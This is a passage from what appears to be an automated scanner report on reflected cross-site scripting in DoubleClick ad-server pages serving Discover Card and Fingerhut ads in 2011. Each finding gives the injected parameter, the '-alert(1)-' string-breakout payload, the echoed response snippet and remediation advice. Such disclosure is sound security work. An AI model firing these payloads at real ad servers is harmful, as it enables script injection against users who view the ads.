This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4313 Date: Tue, 28 Jun 2011 02:17:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... FINAL_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852f6436'-alert(1)-'d8cc99c698b&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'ht ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc7c'-alert(1)-'e931caa6fc4 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4297 Date: Tue, 28 Jun 2011 02:18:22 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... tivewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=369835fc7c'-alert(1)-'e931caa6fc4&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0 ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f42d'-alert(1)-'97132edf540 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4194 Date: Tue, 28 Jun 2011 02:18:01 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ar dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=171848565f42d'-alert(1)-'97132edf540&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/ ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a976'-alert(1)-'0dc5b971d37 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4194 Date: Tue, 28 Jun 2011 02:16:31 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = 'http://s0.2mdn.net/1796512/CB300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=979566a976'-alert(1)-'0dc5b971d37&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var target = '_blank'; var ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3599e'-alert(1)-'ee68f7e2a73 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:16:50 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 12/OpenRoad_FINAL_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=13092273103599e'-alert(1)-'ee68f7e2a73&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ef6'-alert(1)-'386b12da849 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4297
Date: Tue, 28 Jun 2011 02:16:08 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... f = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.JPG'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=1575519ef6'-alert(1)-'386b12da849&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6' ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae57a'-alert(1)-'cfb43500a9c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:18:40 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956ae57a'-alert(1)-'cfb43500a9c&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x25 ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c50ad'-alert(1)-'a22d8d8e435 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:19:02 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423c50ad'-alert(1)-'a22d8d8e435&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x250.swf'; var d ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a71'-alert(1)-'e380434b323 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:17:42 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=1168326a71'-alert(1)-'e380434b323&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http:// ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290e8'-alert(1)-'d38eb4805ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4205
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:19:18 GMT
Expires: Tue, 28 Jun 2011 02:19:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=290e8'-alert(1)-'d38eb4805abhttps://www.discovercard.com/cardmembersvcs/acqs/app/display?pageFileId=more15&sc=KBC6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.swf'; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35db2'-alert(1)-'3a61e2f6500 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:15:50 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ext = ''; var dcgif = 'http://s0.2mdn.net/1796512/CB300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b0061135db2'-alert(1)-'3a61e2f6500&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var targ ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3037d'-alert(1)-'8e6906997c7 was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:33 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 6/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=218682303037d'-alert(1)-'8e6906997c7&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize% ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d821'-alert(1)-'7814853e8be was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:36 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... tivewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=158092d821'-alert(1)-'7814853e8be&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash% ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32bc3'-alert(1)-'30e27806cb7 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ar dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=2186785932bc3'-alert(1)-'30e27806cb7&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13a0b'-alert(1)-'b4090b2e029 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'http://s0.2mdn.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=9795613a0b'-alert(1)-'b4090b2e029&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTPr ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48fcb'-alert(1)-'890adbd91c3 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:12 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... n.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=130923056948fcb'-alert(1)-'890adbd91c3&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%2 ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb7b5'-alert(1)-'a24c9917e30 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:30 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ar dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607cb7b5'-alert(1)-'a24c9917e30&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3 ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cbc3'-alert(1)-'e281d6b67ee was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:57 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=979565cbc3'-alert(1)-'e281d6b67ee&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3 ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37287'-alert(1)-'39e905a1df2 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:13:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=2186867337287'-alert(1)-'39e905a1df2&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mass-_- ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9899c'-alert(1)-'b732d4a27f7 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:54 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... _ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=116839899c'-alert(1)-'b732d4a27f7&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250 ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 518ed'-alert(1)-'4b93262946f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5736
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:13:31 GMT
Expires: Tue, 28 Jun 2011 03:13:31 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=518ed'-alert(1)-'4b93262946fhttp://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=PS1Reach&CTMedia=x1&CTProgType=mass&CTUnitSize=300x250&CTTestGrp=flash&cm_mmc=x1-_-mass-_-300x250-_-flash'; var target = '_blank'; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e8c0'-alert(1)-'1349c693deb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:14 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... t = ''; var dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc9638518e8c0'-alert(1)-'1349c693deb&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26 ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4efc"-alert(1)-"09524b1daae was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:13:10 GMT
